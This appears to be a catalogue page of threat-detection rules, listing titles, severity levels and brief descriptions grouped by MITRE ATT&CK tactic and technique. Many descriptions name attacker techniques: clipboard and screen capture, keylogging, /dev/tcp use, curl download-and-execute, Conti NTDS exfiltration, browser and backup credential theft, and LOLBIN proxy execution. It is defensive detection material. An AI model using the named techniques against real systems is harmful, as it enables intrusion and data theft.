Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
PST Export Alert Using eDiscovery AlertmediumAlert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content
PST Export Alert Using New-ComplianceSearchActionmediumAlert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.
Audio CapturelowDetects attempts to record audio with arecord utility
Linux Capabilities DiscoverylowDetects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
Clipboard Collection with Xclip Tool - AuditdlowDetects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
Clipboard Collection of Image Data with Xclip ToollowDetects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
Screen Capture with Import ToollowDetects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed.
Screen Capture with XwdlowDetects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations
Clipboard Collection with Xclip ToollowDetects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
Clipboard Data Collection Via OSAScripthighDetects possible collection of data from the clipboard via execution of the osascript binary
Screen Capture - macOSlowDetects attempts to use screencapture to collect macOS screenshots
Cisco Collect DatalowCollect pertinent data from the configuration files
Cisco Stage DatalowVarious protocols maybe used to put data on the device for exfil or infil
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
Suspicious Access to Sensitive File Extensions - ZeekmediumDetects known sensitive file extensions via Zeek
Processes Accessing the Microphone and WebcammediumPotential adversaries accessing the microphone and webcam in an endpoint.
Suspicious Access to Sensitive File ExtensionsmediumDetects known sensitive file extensions accessed on a network share
DNS Query Request To OneLaunch Update ServicelowDetects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.
WinDivert Driver LoadhighDetects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
CredUI.DLL Loaded By Uncommon ProcessmediumDetects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
ADFS Database Named Pipe Connection By Uncommon ToolmediumDetects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.
Zip A Folder With PowerShell For Staging In Temp - PowerShellmediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
PowerShell Get ClipboardmediumA General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
Zip A Folder With PowerShell For Staging In Temp - PowerShell ModulemediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Automated Collection Command PowerShellmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Windows Screen Capture with CopyFromScreenmediumAdversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
Powershell KeyloggingmediumAdversaries may log user keystrokes to intercept credentials as the user types them.
Potential Keylogger ActivitymediumDetects PowerShell scripts that contains reference to keystroke capturing functions
Powershell Local Email CollectionmediumAdversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
Recon Information for Export with PowerShellmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data
Zip A Folder With PowerShell For Staging In Temp - PowerShell ScriptmediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Compress Data and Lock With Password for Exfiltration With 7-ZIPmediumAn adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
7Zip Compressing Dump FilesmediumDetects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
Data Copied To Clipboard Via Clip.EXElowDetects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Esentutl Steals Browser InformationmediumOne way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
Suspicious Manipulation Of Default Accounts Via Net.EXEhighDetects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
Audio Capture via PowerShellmediumDetects audio capture via PowerShell Cmdlet.
PowerShell Get-Clipboard Cmdlet Via CLImediumDetects usage of the 'Get-Clipboard' cmdlet via CLI
Exchange PowerShell Snap-Ins UsagehighDetects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
Folder Compress To Potentially Suspicious Output Via Compress-Archive CmdletmediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Screen Capture Activity Via Psr.EXEmediumDetects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
PUA - Mouse Lock ExecutionmediumIn Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
Rar Usage with Password and Compression LevelhighDetects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
Files Added To An Archive Using Rar.EXElowDetects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Windows Recall Feature Enabled Via Reg.EXEmediumDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Renamed Remote Utilities RAT (RURAT) ExecutionmediumDetects execution of renamed Remote Utilities (RURAT) via Product PE header field
Audio Capture via SoundRecordermediumDetect attacker collecting audio via SoundRecorder application.
Veeam Backup Database Suspicious QuerymediumDetects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
VeeamBackup Database Credentials Dump Via Sqlcmd.EXEhighDetects dump of credentials in VeeamBackup dbo
SQLite Chromium Profile Data DB AccesshighDetect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
SQLite Firefox Profile Data DB AccesshighDetect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
Automated Collection Command PromptmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Copy From Or To Admin Share Or Sysvol FoldermediumDetects a copy command or a copy utility execution to or from an Admin share or remote
Recon Information for Export with Command PromptmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Compressed File Creation Via Tar.EXElowDetects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
Compressed File Extraction Via Tar.EXElowDetects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
Winrar Compressing Dump FilesmediumDetects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
Winrar Execution in Non-Standard FoldermediumDetects a suspicious winrar execution in a folder which is not the default installation folder
Compress Data and Lock With Password for Exfiltration With WINZIPmediumAn adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
Windows Recall Feature Enabled - DisableAIDataAnalysis Value DeletedmediumDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Suspicious Camera and Microphone AccesshighDetects Processes accessing the camera and microphone from suspicious folder
Periodic Backup For System Registry Hives EnabledmediumDetects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
Windows Recall Feature Enabled - RegistrymediumDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Conti NTDS Exfiltration CommandhighDetects a command used by conti to exfiltrate NTDS
Potential Conti Ransomware Database Dumping Activity Via SQLCmdhighDetects a command used by conti to dump database
Clipboard Data Collection Via PbpastemediumDetects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
System Drawing DLL LoadlowDetects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
Password Protected Compressed File Extraction Via 7ZiplowDetects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
Potentially Suspicious Compression Tool ParametersmediumDetects potentially suspicious command line arguments of common data compression tools
attack.resource_development 34
Show Rules (34)
Title Level Description
Antivirus Relevant File Paths AlertshighDetects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Bitbucket Unauthorized Access To A ResourcecriticalDetects unauthorized access attempts to a resource.
Bitbucket Unauthorized Full Data Export TriggeredcriticalDetects when full data export is attempted an unauthorized user.
Okta Suspicious Activity Reported by End-userhighDetects when an Okta end-user reports activity by their account as being potentially suspicious.
Program Executions in Suspicious FoldersmediumDetects program executions in suspicious non-program folders related to malware or hacking activity
Relevant ClamAV MessagehighDetects relevant ClamAV messages
Linux HackTool ExecutionhighDetects known hacktool execution based on image name.
Relevant Anti-Virus Signature Keywords In Application LoghighDetects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
ProxyLogon MSExchange OabVirtualDirectorycriticalDetects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
Windows Update ErrorinformationalDetects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
Uncommon File Created In Office Startup FolderhighDetects the creation of a file with an uncommon extension in an Office application startup folder
Creation of a DiagcabmediumDetects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
VHD Image Download Via BrowsermediumDetects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
HackTool - PurpleSharp ExecutioncriticalDetects the execution of the PurpleSharp adversary simulation tool
PUA - CsExec ExecutionhighDetects the use of the lesser known remote execution tool named CsExec a PsExec alternative
Renamed SysInternals DebugView ExecutionhighDetects suspicious renamed SysInternals DebugView execution
Potential Execution of Sysinternals ToolslowDetects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
PsExec/PAExec Escalation to LOCAL SYSTEMhighDetects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
Potential PsExec Remote ExecutionhighDetects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
Potential Privilege Escalation To LOCAL SYSTEMhighDetects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges
PUA - Sysinternal Tool Execution - RegistrylowDetects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
Suspicious Execution Of Renamed Sysinternals Tools - RegistryhighDetects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
PUA - Sysinternals Tools Execution - RegistrymediumDetects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
HybridConnectionManager Service Installation - RegistryhighDetects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
Usage of Renamed Sysinternals Tools - RegistrySethighDetects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
Suspicious Keyboard Layout LoadmediumDetects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
Formbook Process CreationhighDetects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
Mustang Panda DropperhighDetects specific process parameters as used by Mustang Panda droppers
CVE-2021-1675 Print Spooler Exploitation Filename PatterncriticalDetects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
Suspicious Word Cab File Write CVE-2021-40444highDetects file creation patterns noticeable during the exploitation of CVE-2021-40444
Conti Volume Shadow ListinghighDetects a command used by conti to find volume shadow backups
FoggyWeb Backdoor DLL LoadingcriticalDetects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
Creation of an Executable by an ExecutablelowDetects the creation of an executable by another executable.
Potential AWS Cloud Email Service AbusemediumDetects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession
attack.reconnaissance 20
Show Rules (20)
Title Level Description
Azure AD Account Credential LeakedhighIndicates that the user's valid credentials have been leaked.
Bitbucket User Details Export Attempt DetectedmediumDetects user data export activity.
Bitbucket User Permissions Export AttemptmediumDetects user permission data export attempt.
Suspicious Use of /dev/tcpmediumDetects suspicious command with /dev/tcp
SSHD Error Message CVE-2018-15473mediumDetects exploitation attempt using public exploit code for CVE-2018-15473
Cat SudoersmediumDetects the execution of a cat /etc/sudoers to list all users that have sudo rights
Suspicious Git Clone - LinuxmediumDetects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
Print History File ContentsmediumDetects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Linux Recon IndicatorshighDetects events with patterns found in commands used for reconnaissance on linux systems
DNS Query to External Service Interaction DomainshighDetects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
Failed DNS Zone TransfermediumDetects when a DNS zone transfer failed.
Suspicious DNS Query for IP Lookup Service APIsmediumDetects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.
Potential Active Directory Enumeration Using AD Module - PsModulemediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - PsScriptmediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
Suspicious Git ClonemediumDetects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
AADInternals PowerShell Cmdlets Execution - ProccessCreationhighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - ProcCreationmediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
PUA - PingCastle ExecutionmediumDetects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
PUA - PingCastle Execution From Potentially Suspicious ParenthighDetects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.

Top MITRE Techniques

TechniqueCountRule TitleCount Bar
attack.t1218 150
Show Rules (150)
  • Suspicious CLR Logs Creation - Level: high
    Description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction - Level: medium
    Description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction - Level: medium
    Description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
  • Monitoring Wuauclt.exe For Lolbas Execution Of DLL - Level: medium
    Description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
  • MavInject Process Injection - Level: high
    Description: Detects process injection using the signed Windows tool Mavinject32.exe
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • Squirrel Lolbin - Level: medium
    Description: Detects Possible Squirrel Packages Manager as Lolbin
  • Windows Update Client LOLBIN - Level: high
    Description: Detects code execution via the Windows Update client (wuauclt)
  • Suspicious Esentutl Use - Level: high
    Description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • MSI Installation From Web - Level: medium
    Description: Detects installation of a remote msi file from web.
  • Suspicious DotNET CLR Usage Log Artifact - Level: high
    Description: Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.
  • Self Extraction Directive File Created In Potentially Suspicious Location - Level: medium
    Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
  • Created Files by Microsoft Sync Center - Level: medium
    Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
  • Legitimate Application Dropped Archive - Level: high
    Description: Detects programs on a Windows system that should not write an archive to disk
  • Legitimate Application Dropped Executable - Level: high
    Description: Detects programs on a Windows system that should not write executables to disk
  • Legitimate Application Dropped Script - Level: high
    Description: Detects programs on a Windows system that should not write scripts to disk
  • Potentially Suspicious Self Extraction Directive File Created - Level: medium
    Description: Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.
  • Time Travel Debugging Utility Usage - Image - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Potential DLL Sideloading Using Coregen.exe - Level: medium
    Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
  • Network Connection Initiated By AddinUtil.EXE - Level: high
    Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
  • Microsoft Sync Center Suspicious Network Connections - Level: medium
    Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
  • Potentially Suspicious Wuauclt Network Connection - Level: medium
    Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
  • Potential RemoteFXvGPUDisablement.EXE Abuse - Level: high
    Description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module - Level: high
    Description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
  • SyncAppvPublishingServer Bypass Powershell Restriction - PS Module - Level: medium
    Description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock - Level: high
    Description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction - Level: medium
    Description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
  • Suspicious AddinUtil.EXE CommandLine Execution - Level: high
    Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
  • Uncommon Child Process Of AddinUtil.EXE - Level: medium
    Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
  • Uncommon AddinUtil.EXE CommandLine Execution - Level: medium
    Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
  • AddinUtil.EXE Execution From Uncommon Directory - Level: medium
    Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
  • AgentExecutor PowerShell Execution - Level: medium
    Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
  • Suspicious AgentExecutor PowerShell Execution - Level: high
    Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
  • Uncommon Child Process Of Appvlp.EXE - Level: medium
    Description: Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
  • Uncommon Assistive Technology Applications Execution Via AtBroker.EXE - Level: medium
    Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
  • Suspicious Child Process Of BgInfo.EXE - Level: high
    Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • BitLockerTogo.EXE Execution - Level: low
    Description: Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
  • Uncommon Child Process Of BgInfo.EXE - Level: medium
    Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Potential Binary Proxy Execution Via Cdb.EXE - Level: medium
    Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
  • DLL Loaded via CertOC.EXE - Level: medium
    Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
  • Suspicious DLL Loaded via CertOC.EXE - Level: high
    Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
  • Potential NTLM Coercion Via Certutil.EXE - Level: high
    Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
  • Potential Arbitrary File Download Via Cmdl32.EXE - Level: medium
    Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
  • Curl Download And Execute Combination - Level: high
    Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
  • Potentially Suspicious CMD Shell Output Redirect - Level: medium
    Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
  • Suspicious Csi.exe Usage - Level: medium
    Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
  • Uncommon Child Process Of Defaultpack.EXE - Level: medium
    Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
  • Arbitrary MSI Download Via Devinit.EXE - Level: medium
    Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
  • Potentially Suspicious Child Process Of DiskShadow.EXE - Level: medium
    Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
  • Diskshadow Script Mode - Uncommon Script Extension Execution - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.
  • Diskshadow Script Mode - Execution From Potential Suspicious Location - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
  • Potential Application Whitelisting Bypass via Dnx.EXE - Level: medium
    Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
  • Process Memory Dump Via Dotnet-Dump - Level: medium
    Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE - Level: medium
    Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
  • Binary Proxy Execution Via Dotnet-Trace.EXE - Level: medium
    Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
  • Potentially Over Permissive Permissions Granted Using Dsacls.EXE - Level: medium
    Description: Detects usage of Dsacls to grant over permissive permissions
  • Potential Password Spraying Attempt Using Dsacls.EXE - Level: medium
    Description: Detects possible password spraying attempts using Dsacls
  • New Capture Session Launched Via DXCap.EXE - Level: medium
    Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
  • Potentially Suspicious Cabinet File Expansion - Level: medium
    Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious ZipExec Execution - Level: medium
    Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location - Level: high
    Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.
  • Arbitrary File Download Via IMEWDBLD.EXE - Level: high
    Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
  • InfDefaultInstall.exe .inf Execution - Level: medium
    Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
  • File Download Via InstallUtil.EXE - Level: medium
    Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
  • Import LDAP Data Interchange Format File Via Ldifde.EXE - Level: medium
    Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
